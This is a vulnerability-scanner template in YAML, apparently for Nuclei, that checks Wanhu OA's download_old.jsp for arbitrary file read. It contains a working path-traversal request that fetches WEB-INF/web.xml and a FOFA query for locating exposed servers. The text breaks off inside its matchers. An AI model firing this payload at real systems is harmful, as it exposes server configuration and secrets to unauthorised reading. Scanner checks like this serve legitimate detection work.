id: wanhu-download-old-file-read info: name: Wanhu OA download_old.jsp - Arbitrary File Read author: SleepingBag945 severity: high description: | There is an arbitrary file download vulnerability in the Wanhu OA download_old.jsp file. An attacker can download any file on the server through the vulnerability. reference: - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_old.jsp%20任意文件下载漏洞.html - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/wanhu-oa-download-old-file-read.yaml metadata: verified: true max-request: 1 fofa-query: app="万户网络-ezOFFICE" tags: wanhu,lfi http: - method: GET path: - "{{BaseURL}}/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml" matchers-condition: and matchers: - type: word words: - "